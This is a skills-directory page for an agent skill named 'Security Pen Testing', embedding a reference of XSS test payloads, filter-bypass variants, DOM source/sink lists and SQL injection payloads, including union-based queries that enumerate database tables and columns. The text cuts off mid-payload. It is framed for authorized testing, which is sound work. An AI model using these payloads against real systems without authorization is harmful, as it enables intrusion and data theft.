Security Pen Testing
Apply authorized, non-destructive XSS and injection test payloads and bypass patterns while hardening web apps before release.
Install
npx skills add https://github.com/alirezarezvani/claude-skills --skill security-pen-testingWhat is this skill?
- Reflected XSS payload sets for search fields, URL parameters, forms, and headers
- Filter-bypass variants including case mixing, nested tags, char-code alerts, and SVG/onload vectors
- URL-encoded and context-specific attribute-breakout payloads
- Framed for authorized penetration tests, CTF practice, and defensive detection—not exploitation of third parties
Adoption & trust: 570 installs on skills.sh; 17.5k GitHub stars; 3/3 security scanners passed (skills.sh audits).
Recommended Skills
Azure Compliancemicrosoft/azure-skills
Openclaw Secure Linux Cloudxixu-me/skills
Entra Agent Idmicrosoft/azure-skills
Firebase Security Rules Auditorfirebase/agent-skills
Firestore Security Rules Auditorfirebase/agent-skills
Skill Vetteruseai-pro/openclaw-skills-security
Journey fit
Ship/security is the canonical shelf because the skill supplies offensive test patterns meant for pre-release verification and defensive research—not ideation or growth analytics. Penetration-style input testing belongs in security subphase alongside reviews and hardening before you expose user-facing forms and parameters.
Common Questions / FAQ
Is Security Pen Testing safe to install?
skills.sh reports 3 of 3 security scanners passed. Review the Security Audits panel on this page before installing in production.
SKILL.md
READMESKILL.md - Security Pen Testing
# Attack Patterns Reference Safe, non-destructive test payloads and detection patterns for authorized security testing. All techniques here are for use in authorized penetration tests, CTF challenges, and defensive research only. --- ## XSS Test Payloads ### Reflected XSS These payloads test whether user input is reflected in HTTP responses without proper encoding. Use in search fields, URL parameters, form inputs, and HTTP headers. **Basic payloads:** ``` <script>alert(document.domain)</script> "><script>alert(document.domain)</script> '><script>alert(document.domain)</script> <img src=x onerror=alert(document.domain)> <svg onload=alert(document.domain)> <body onload=alert(document.domain)> <input onfocus=alert(document.domain) autofocus> <marquee onstart=alert(document.domain)> <details open ontoggle=alert(document.domain)> ``` **Filter bypass payloads:** ``` <ScRiPt>alert(document.domain)</ScRiPt> <scr<script>ipt>alert(document.domain)</scr</script>ipt> <script>alert(String.fromCharCode(100,111,99,117,109,101,110,116,46,100,111,109,97,105,110))</script> <img src=x onerror="alert(1)"> <svg/onload=alert(document.domain)> javascript:alert(document.domain)// ``` **URL encoding payloads:** ``` %3Cscript%3Ealert(document.domain)%3C/script%3E %3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E ``` **Context-specific payloads:** Inside HTML attribute: ``` " onmouseover="alert(document.domain) ' onfocus='alert(document.domain)' autofocus=' ``` Inside JavaScript string: ``` ';alert(document.domain);// \';alert(document.domain);// </script><script>alert(document.domain)</script> ``` Inside CSS: ``` expression(alert(document.domain)) url(javascript:alert(document.domain)) ``` ### Stored XSS Test these in persistent fields: user profiles, comments, forum posts, file upload names, chat messages. ``` <img src=x onerror=alert(document.domain)> <a href="javascript:alert(document.domain)">click me</a> <svg><animate onbegin=alert(document.domain) attributeName=x dur=1s> ``` ### DOM-Based XSS Look for JavaScript that reads from these sources and writes to dangerous sinks: **Sources** (attacker-controlled input): ``` document.location document.location.hash document.location.search document.referrer window.name document.cookie localStorage / sessionStorage postMessage data ``` **Sinks** (dangerous output): ``` element.innerHTML element.outerHTML document.write() document.writeln() eval() setTimeout(string) setInterval(string) new Function(string) element.setAttribute("onclick", ...) location.href = ... location.assign(...) ``` **Detection pattern:** Search for any code path where a Source flows into a Sink without sanitization. --- ## SQL Injection Detection Patterns ### Detection Payloads **Error-based detection:** ``` ' -- Single quote triggers SQL error " -- Double quote \ -- Backslash ' OR '1'='1 -- Boolean true ' OR '1'='2 -- Boolean false (compare responses) ' AND 1=1-- -- Boolean true with comment ' AND 1=2-- -- Boolean false (compare responses) 1 OR 1=1 -- Numeric injection 1 AND 1=2 -- Numeric false ``` **Union-based enumeration** (authorized testing only): ```sql -- Step 1: Find column count ' ORDER BY 1-- ' ORDER BY 2-- ' ORDER BY 3-- -- Increment until error ' UNION SELECT NULL-- ' UNION SELECT NULL,NULL-- -- Match column count -- Step 2: Find displayable columns ' UNION SELECT 'a',NULL,NULL-- ' UNION SELECT NULL,'a',NULL-- -- Step 3: Extract database info ' UNION SELECT version(),NULL,NULL-- ' UNION SELECT table_name,NULL,NULL FROM information_schema.tables-- ' UNION SELECT column_name,NULL,NULL FROM information_schema.columns WHERE table_name='users'-- ``` **Time-based blind injection:** ```sql -- MySQL ' AND SLEEP(5)-- ' AND IF(1=1, SLEEP(5), 0)-- ' AND IF(SUBSTRING(version(),1,1)='5', SLEE